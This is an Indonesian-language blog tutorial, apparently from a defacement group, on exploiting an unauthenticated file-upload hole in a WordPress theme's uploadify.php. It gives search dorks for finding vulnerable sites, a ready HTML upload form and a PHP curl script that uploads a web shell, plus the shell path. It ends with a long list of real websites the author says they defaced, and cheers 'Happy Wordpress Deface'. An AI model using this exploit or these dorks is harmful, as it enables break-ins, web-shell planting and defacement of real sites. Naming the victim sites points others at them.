Thursday, 28 May 2015

Tutorial Deface Wordpress Themes Qualifire File Upload

xixihi, Nuenomaru disini .-.
sesuai judul thread nue akan share sekarang :v
Bug 11/12 sama uploadify ,siapa tau ada yang belum tau

Dork : 
- inurl:"/wp-content/themes/qualifire"
inurl:"/wp-content/themes/qualifire" site:.fr
(sisanya kembangin lagi, biar dapet web2 yang vuln and verawaan :v )

Pengendali Pinguin bisa baca ini dulu ;)
Dorking pada BinGoo di Linux

Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Vuln? 
biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe





Copy Script Upload CSRF:
<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
* Save As: .html (contoh.html)
* edit/ganti target.co.li ~> menjadi link target yang sobat temukan

- Lalu buka .html yang sudah kalian save
- klik browse (pilih shell , pilih script deface , pilih gambar , atau file txt)
*seterah kalian mau upload apa, tapi disini saya akan upload file gambar (png, jpg, gift, dll)



Jika upload file anda berhasil kalo gak salah akan nampak seperti gambar dibawah:



Done :p

Shell Akses:
http;//site.com/namashell.php


karna saya upload gambar jadinya kek gitu:

http://site.com/tkjcyberarttimeline.png





Remote file :
<?php
  
$uploadfile="shell.php";
$ch = curl_init("target.coli/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
  print "$postResult";
?>

Shell Akses: /wp-content/themes/qualifire/scripts/admin/uploadify/namashell.php
Sekian tutorial cupuu dari saya :'(
*jangan bully plis

Demo Tested By Nuenomaru | TKJ CYBER ART:

http://www.floridahurricaneclaim.org/tkjcyberart.htm
http://www.depal.it/tkjcyberart.htm
http://www.vitalisspor.com.tr/tkjcyberart.htm
http://cazatalentos.gsconsultores.cl/tkjcyberart.htm
http://www.tecnigrafformosa.com.ar/tkjcyberart.htm
http://www.altusdisain.ee/tkjcyberart.htm
http://www.tablawfirm.net/tkjcyberart.htm
http://theyuppypuppy.net/tkjcyberart.htm
http://pointscape.net/tkjcyberart.htm
http://www.tropicanaplants.net/tkjcyberart.htm
http://www.frontierlighting.net/nuenomaru.html
http://www.marefrigeracao.net/nuenomaru.html
http://www.tecnigrafformosa.com.ar/nuenomaru.html
http://cazatalentos.gsconsultores.cl/nuenomaru.html
http://www.altusdisain.ee/nuenomaru.html
http://www.depal.it/nuenomaru.html
http://pedetcell.esy.es/nuenomaru.html
http://www.vitalisspor.com.tr/nuenomaru.html
http://www.foto3.kuckovsky.sk/nuenomaru.html
http://www.archermedia.ro/nuenomaru.html
http://www.proconfortgrup.ro/tkjcyberart.htm
http://www.clararededeprotecao.com.br/tkjcyberart.htm
http://www.institutobelezaeestetica.com.br/tkjcyberart.htm
http://www.casaprojetada.com.br/nuenomaru.html
http://agssi.com.br/nuenomaru.html
http://www.lhpyacht.cz/tkjcyberart.htm
http://domfunkcjonalny.pl/tkjcyberart.htm
http://auroraaudio.net/tkjcyberart.htm
http://visionsandiego.com/tkjcyberart.htm
http://videosurveillanceforce.com/tkjcyberart.htm
http://schaumbergbuilders.com/tkjcyberart.htm
http://seattleu-esw.org/tkjcyberart.htm
http://www.daewoomaquinarias.com.pe/nuenomaru.html
http://www.vitalisspor.com.tr/nuenomaru.html
http://ulusalyangin.com.tr/nuenomaru.html
http://nationalnanomaterials.com/nuenomaru.html
http://www.afreestylecamp.com/tkjcyberart.htm
http://orlandoconsolerepair.com/tkjcyberart.htm
http://www.countrywdc.co.uk/tkjcyberarttimeline.png
http://nuovaclean.it/tkjcyberarttimeline.png
http://www.nuovaclean.it/tkjcyberart.png
http://paccdc.org/tkjcyber2.jpg
http://www.blackpants.net/tkjciber4.jpg
http://www.maxiwall.co.za/tkjciber3.jpg
http://www.grill-n-chill.co.uk/tkjciber.jpg
http://www.oni2015.isj-db.ro/tkjcyberarttimeline.png
http://www.qualitechservice.com.br/tkjciber4.jpg
http://www.tecrocompany.ro/tkjcyber.png
http://www.equipmentdoctor.ca/tkj%20cyber%20art3.jpg
http://www.dev.constr18.whc.ca/tkj%20cyber%20art.jpg
http://kait.mx/tkjcyber.jpg
http://stavrostonerestoration.com.au/tkjcyber.jpg
http://jpc.com.my/tkjcyber2.jpg
http://the-paint-pub.com/tkj%20cyber%20art.jpg
http://bedcraftersbymichelle.com/tkjcyberarttimeline.png
http://annsimas.com/tkjcyberarttimeline.png
http://www.frontierlighting.net/tkjcyberarttimeline.png
http://www.blackpants.net/tkjcyberarttimeline.png
http://www.reklame-forum.no/tkjcyberart.png
http://www.roodfotografie.nl/tkjcyber2.jpg


Semoga bermanfaat , dan maaf bila ada kesalahan
Happy Wordpress Deface ya Om


Source and thanks to: Forum INCEF



Nuenomaru


Nuenomaru just an illusion in Cyber World






Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

4 comments

xixhxi ,, thanks dah komen ^^
selamat mencoba
have a nice day kakz akwakw


Nuenomaru

gambar yg manee om yg rusak..
ane buka di 2 lepy dengan jaringan yg berbeda kok gambarnya aman2 aje ya om..

kalo beneran emg ada yg rusak, tolong cantumin link ss, dan report disiini: http://tkjcyberart.blogspot.co.id/2016/05/broken-link-and-image-reporter.html

terimakasih partisipasinya
#Nuenomaru


EmoticonEmoticon